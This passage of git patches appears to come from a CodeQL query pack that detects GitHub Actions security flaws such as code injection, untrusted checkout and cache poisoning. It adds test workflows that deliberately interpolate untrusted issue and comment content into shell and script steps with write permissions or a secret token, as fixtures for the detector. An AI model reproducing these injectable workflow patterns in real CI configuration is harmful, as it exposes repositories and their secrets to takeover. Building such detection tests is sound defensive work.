github.event.issue.number }} + payload_marker: request + fail_on_missing: false + approve-or-deny-request: + runs-on: self-hosted + needs: parse-issue + if: needs.parse-issue.outputs.payload != 'NOT_FOUND' + steps: + - name: Lookup the latest release of ${{ fromJson(needs.parse-issue.outputs.payload).owner }}/${{ fromJson(needs.parse-issue.outputs.payload).repo }} + id: get_version + env: + OWNER: ${{ fromJson(needs.parse-issue.outputs.payload).owner }} + REPO: ${{ fromJson(needs.parse-issue.outputs.payload).repo }} + REQUEST_VERSION: ${{ fromJson(needs.parse-issue.outputs.payload).version }} + run: | + if [ $REQUEST_VERSION == 'latest' ]; then + echo "Finding latest release of $OWNER/$REPO..." + export VERSION=`curl https://api.github.com/repos/$OWNER/$REPO/releases/latest | jq -r .name` + else + export VERSION=$REQUEST_VERSION + fi + echo "VERSION: $VERSION" + echo "version=$VERSION" >> $GITHUB_OUTPUT + - name: Check out scripts + uses: actions/checkout@v3 + - name: Setup Node + uses: actions/setup-node@v3 + with: + node-version: '14' + check-latest: true + - name: Install dependencies + run: | + cd .github/scripts + npm install + - name: Approve or deny request + uses: actions/github-script@main + env: + VERSION: ${{ steps.get_version.outputs.version }} + with: + debug: true + script: | + const options = { token: '${{ secrets.TOKEN }}', adminOpsOrg: '${{ vars.ADMIN_OPS_ORG }}', actionsApprovedOrg: '${{ vars.ACTIONS_APPROVED_ORG }}', actionsApproverTeam: '${{ vars.ACTIONS_APPROVERS_TEAM }}', baseUrl: '${{ github.api_url }}', version: process.env.VERSION }; + const payload = ${{ needs.parse-issue.outputs.payload }} + await require('./.github/scripts/approve-or-deny-request.js')({github, context, payload, options}); From 0473c3824f46c74b04dbf80ac762751a9c83f090 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 14 May 2024 11:38:39 +0200 Subject: [PATCH 0273/1267] Treat branch-deploy action as a source of HEAD ref for untrusted checkouts --- .../actions/security/UntrustedCheckoutQuery.qll | 12 +++++++++--- 1 file changed, 9 insertions(+), 3 deletions(-) diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index 10a45830324..421af3be8ab 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -92,9 +92,15 @@ class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesSt or // 3rd party actions returning the PR head sha/ref exists(UsesStep step | - step.getCallee() = ["eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch"] and - // TODO: This should be read step of the head_sha or head_ref output vars - this.getArgument("ref").regexpMatch(".*head_ref.*") and + ( + step.getCallee() = ["eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch"] and + // TODO: This should be read step of the head_sha or head_ref output vars + this.getArgument("ref").matches("%.head_ref%") + or + step.getCallee() = ["github/branch-deploy"] and + // TODO: This should be read step of the ref output var + this.getArgument("ref").matches("%.ref%") + ) and DataFlow::hasLocalFlowExpr(step, this.getArgumentExpr("ref")) ) or From a0939bb0a3dfc8fbbccd7c055ac2715fabede49c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 14 May 2024 15:29:45 +0200 Subject: [PATCH 0274/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index e68a4c67cc4..acfc1c7e210 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.22 +version: 0.0.23 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 465be503e7c..efafbbb55ba 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.22 +version: 0.0.23 groups: - actions - queries From ca59423c8a47ba15afebfa5213a9566bdf962de3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 14 May 2024 15:32:40 +0200 Subject: [PATCH 0275/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index acfc1c7e210..54748d6fd62 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.23 +version: 0.0.24 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index efafbbb55ba..1b8d7e64028 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.23 +version: 0.0.24 groups: - actions - queries From f96b9cc5356f5ffd29b7f94fb54fd59df2aafe93 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 14 May 2024 15:35:13 +0200 Subject: [PATCH 0276/1267] Update tests --- ql/test/library-tests/test.expected | 1 + .../query-tests/Security/CWE-094/CodeInjection.expected | 7 +++++++ .../Security/CWE-094/PrivilegedCodeInjection.expected | 8 ++++++++ 3 files changed, 16 insertions(+) diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 61f7120e78e..20db431fc24 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -464,6 +464,7 @@ sources | jitterbit/get-changed-files | * | output.renamed | filename | manual | | khan/pull-request-comment-trigger | * | output.comment_body | text | manual | | marocchino/on_artifact | * | output.* | artifact | manual | +| peter-murray/issue-body-parser-action | * | output.* | text | manual | | puppeteer/puppeteer/.github/workflows/changed-packages.yml | * | output.changes | filename | manual | | redhat-plumbers-in-action/download-artifact | * | output.* | artifact | manual | | tj-actions/branch-names | * | output.current_branch | branch | manual | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index 9e479f9eaf4..cc716c47e69 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected @@ -59,6 +59,9 @@ edges | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | +| .github/workflows/test3.yml:11:7:12:4 | Job outputs node [payload] | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | +| .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test3.yml:11:7:12:4 | Job outputs node [payload] | +| .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | @@ -222,6 +225,10 @@ nodes | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | semmle.label | steps.changed.outputs.locale_files | | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | semmle.label | Uses Step: changed2 | | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | semmle.label | steps.changed2.outputs.locale_files | +| .github/workflows/test3.yml:11:7:12:4 | Job outputs node [payload] | semmle.label | Job outputs node [payload] | +| .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | semmle.label | steps.issue_body_parser_request.outputs.payload | +| .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | semmle.label | Uses Step: issue_body_parser_request | +| .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | semmle.label | needs.parse-issue.outputs.payload | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index 738270e3ccd..87658e4149e 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected @@ -59,6 +59,9 @@ edges | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | +| .github/workflows/test3.yml:11:7:12:4 | Job outputs node [payload] | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | +| .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test3.yml:11:7:12:4 | Job outputs node [payload] | +| .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | @@ -222,6 +225,10 @@ nodes | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | semmle.label | steps.changed.outputs.locale_files | | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | semmle.label | Uses Step: changed2 | | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | semmle.label | steps.changed2.outputs.locale_files | +| .github/workflows/test3.yml:11:7:12:4 | Job outputs node [payload] | semmle.label | Job outputs node [payload] | +| .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | semmle.label | steps.issue_body_parser_request.outputs.payload | +| .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | semmle.label | Uses Step: issue_body_parser_request | +| .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | semmle.label | needs.parse-issue.outputs.payload | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | @@ -333,6 +340,7 @@ subpaths | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | ${{ steps.changed.outputs.locale_files }} | | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | ${{ steps.changed2.outputs.locale_files }} | +| .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | From 30d0b9d1333120d31fc4a378b5f8c38428fac760 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 14 May 2024 22:07:49 +0200 Subject: [PATCH 0277/1267] Add context paths containing tainted fields --- .../codeql/actions/dataflow/FlowSources.qll | 30 ++++++++----------- 1 file changed, 13 insertions(+), 17 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 9e4c258e39a..08717c33787 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -76,22 +76,6 @@ private predicate textEvent(string context) { ) } -// bindingset[context] -// private predicate repoNameEvent(string context) { -// exists(string reg | -// reg = -// [ -// // repo name -// // Owner: All characters must be either a hyphen (-) or alphanumeric -// // Repo: All code points must be either a hyphen (-), an underscore (_), a period (.), or an ASCII alphanumeric code point -// "github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.repo\\.name", // repo name -// "github\\.event\\.workflow_run\\.head_repository\\.name", // repo name -// "github\\.event\\.workflow_run\\.head_repository\\.full_name", // nwo -// ] -// | -// Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) -// ) -// } bindingset[context] private predicate branchEvent(string context) { exists(string reg | @@ -194,7 +178,19 @@ private predicate jsonEvent(string context) { reg = [ // json - "github\\.event", + "github\\.event", "github\\.event\\.client_payload", "github\\.event\\.comment", + "github\\.event\\.commits", "github\\.event\\.discussion", "github\\.event\\.head_commit", + "github\\.event\\.head_commit\\.author", "github\\.event\\.head_commit\\.committer", + "github\\.event\\.inputs", "github\\.event\\.issue", "github\\.event\\.merge_group", + "github\\.event\\.merge_group\\.committer", "github\\.event\\.pull_request", + "github\\.event\\.pull_request\\.head", "github\\.event\\.pull_request\\.head\\.repo", + "github\\.event\\.pages", "github\\.event\\.review", "github\\.event\\.workflow", + "github\\.event\\.workflow_run", "github\\.event\\.workflow_run\\.head_branch", + "github\\.event\\.workflow_run\\.head_commit", + "github\\.event\\.workflow_run\\.head_commit\\.author", + "github\\.event\\.workflow_run\\.head_commit\\.committer", + "github\\.event\\.workflow_run\\.head_repository", + "github\\.event\\.workflow_run\\.pull_requests", ] | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) From 7a66b12437ec1870d915e2fd421131119fdbcacb Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 14 May 2024 22:33:50 +0200 Subject: [PATCH 0278/1267] add tests --- .../CWE-094/.github/workflows/test4.yml | 19 +++++++++++++++++++ .../Security/CWE-094/CodeInjection.expected | 2 ++ .../CWE-094/PrivilegedCodeInjection.expected | 4 ++++ 3 files changed, 25 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test4.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test4.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test4.yml new file mode 100644 index 00000000000..c4380bfa8af --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test4.yml @@ -0,0 +1,19 @@ +name: Test +on: + issue_comment: + types: [created, edited] + +permissions: + contents: write + +jobs: + test: + runs-on: ubuntu-latest + steps: + - name: Dump GitHub comment context + id: github_comment_step + run: echo '${{ toJSON(github.event.comment) }}' + + - name: Dump GitHub issue context + id: github_issue_step + run: echo '${{ toJSON(github.event.issue) }}' diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index cc716c47e69..34e173a055b 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected @@ -229,6 +229,8 @@ nodes | .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | semmle.label | steps.issue_body_parser_request.outputs.payload | | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | semmle.label | Uses Step: issue_body_parser_request | | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | semmle.label | needs.parse-issue.outputs.payload | +| .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | semmle.label | toJSON(github.event.comment) | +| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | semmle.label | toJSON(github.event.issue) | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index 87658e4149e..4b270404373 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected @@ -229,6 +229,8 @@ nodes | .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | semmle.label | steps.issue_body_parser_request.outputs.payload | | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | semmle.label | Uses Step: issue_body_parser_request | | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | semmle.label | needs.parse-issue.outputs.payload | +| .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | semmle.label | toJSON(github.event.comment) | +| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | semmle.label | toJSON(github.event.issue) | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | @@ -341,6 +343,8 @@ subpaths | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | ${{ steps.changed.outputs.locale_files }} | | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | ${{ steps.changed2.outputs.locale_files }} | | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | +| .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | ${{ toJSON(github.event.comment) }} | +| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | ${{ toJSON(github.event.issue) }} | | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | From 6e8fc89034f9214461714c6401c277be95565483 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Wed, 15 May 2024 09:29:24 +0000 Subject: [PATCH 0279/1267] Add default branch name check --- ql/lib/codeql/actions/dataflow/ExternalFlow.qll | 10 ++++++++-- .../dataflow/internal/ExternalFlowExtensions.qll | 6 +++++- .../actions/security/CachePoisoningQuery.qll | 15 ++++++++------- ql/lib/ext/workflow-models/workflow-models.yml | 6 ++++++ ql/test/library-tests/workflowenum.ql | 6 +++--- 5 files changed, 30 insertions(+), 13 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index 5db10e7823e..f10a90ee6ee 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -3,10 +3,16 @@ private import codeql.actions.DataFlow private import actions predicate workflowDataModel( - string path, string visibility, string job, string secrets_source, string permissions, + string path, string trigger, string job, string secrets_source, string permissions, string runner ) { - Extensions::workflowDataModel(path, visibility, job, secrets_source, permissions, runner) + Extensions::workflowDataModel(path, trigger, job, secrets_source, permissions, runner) +} + +predicate repositoryDataModel( + string visibility, string default_branch_name +) { + Extensions::repositoryDataModel(visibility, default_branch_name) } /** diff --git a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll index 529f7721e71..34f0297d799 100644 --- a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll +++ b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll @@ -24,6 +24,10 @@ extensible predicate sinkModel( ); extensible predicate workflowDataModel( - string path, string visibility, string job, string secrets_source, string permissions, + string path, string trigger, string job, string secrets_source, string permissions, string runner ); + +extensible predicate repositoryDataModel( + string visibility, string default_branch_name +); diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index ab0f2d0809a..df2e1db3bdd 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll @@ -10,17 +10,18 @@ string defaultBranchTriggerEvent() { ] } -string defaultBranchNames() { result = ["main", "master", "default"] } - predicate runsOnDefaultBranch(Job j) { exists(Event e | j.getATriggerEvent() = e and + exists(string default_branch_name | + repositoryDataModel(_, default_branch_name) + ) and ( e.getName() = defaultBranchTriggerEvent() and not e.getName() = "pull_request_target" or e.getName() = "push" and - e.getAPropertyValue("branches") = defaultBranchNames() + e.getAPropertyValue("branches") = default_branch_name or e.getName() = "pull_request_target" and ( @@ -30,18 +31,18 @@ predicate runsOnDefaultBranch(Job j) { // only branches-ignore filter e.hasProperty("branches-ignore") and not e.hasProperty("branches") and - not e.getAPropertyValue("branches-ignore") = defaultBranchNames() + not e.getAPropertyValue("branches-ignore") = default_branch_name or // only branches filter e.hasProperty("branches") and not e.hasProperty("branches-ignore") and - e.getAPropertyValue("branches") = defaultBranchNames() + e.getAPropertyValue("branches") = default_branch_name or // branches and branches-ignore filters e.hasProperty("branches") and e.hasProperty("branches-ignore") and - e.getAPropertyValue("branches") = defaultBranchNames() and - not e.getAPropertyValue("branches-ignore") = defaultBranchNames() + e.getAPropertyValue("branches") = default_branch_name and + not e.getAPropertyValue("branches-ignore") = default_branch_name ) ) ) diff --git a/ql/lib/ext/workflow-models/workflow-models.yml b/ql/lib/ext/workflow-models/workflow-models.yml index f9f983be693..ca4a46b25d0 100644 --- a/ql/lib/ext/workflow-models/workflow-models.yml +++ b/ql/lib/ext/workflow-models/workflow-models.yml @@ -1,4 +1,10 @@ extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: repositoryDataModel + data: [ + - ["public", "main"] + ] - addsTo: pack: githubsecuritylab/actions-all extensible: workflowDataModel diff --git a/ql/test/library-tests/workflowenum.ql b/ql/test/library-tests/workflowenum.ql index 692d1eb706b..b3dc9185ec4 100644 --- a/ql/test/library-tests/workflowenum.ql +++ b/ql/test/library-tests/workflowenum.ql @@ -2,7 +2,7 @@ import actions import codeql.actions.dataflow.internal.ExternalFlowExtensions as Extensions from - string path, string visibility, string job, string secrets_source, string permissions, + string path, string trigger, string job, string secrets_source, string permissions, string runner -where Extensions::workflowDataModel(path, visibility, job, secrets_source, permissions, runner) -select visibility, path, job, secrets_source, permissions, runner +where Extensions::workflowDataModel(path, trigger, job, secrets_source, permissions, runner) +select trigger, path, job, secrets_source, permissions, runner From f38af29f80f24ece46242b1c29d26ccd3d3fce55 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Wed, 15 May 2024 09:36:18 +0000 Subject: [PATCH 0280/1267] Fix array --- ql/lib/ext/workflow-models/workflow-models.yml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/ql/lib/ext/workflow-models/workflow-models.yml b/ql/lib/ext/workflow-models/workflow-models.yml index ca4a46b25d0..2293080d93e 100644 --- a/ql/lib/ext/workflow-models/workflow-models.yml +++ b/ql/lib/ext/workflow-models/workflow-models.yml @@ -2,9 +2,8 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all extensible: repositoryDataModel - data: [ + data: - ["public", "main"] - ] - addsTo: pack: githubsecuritylab/actions-all extensible: workflowDataModel From cae29e0abe34af10186565c751a4a3c5affb4dd4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Wed, 15 May 2024 10:03:17 +0000 Subject: 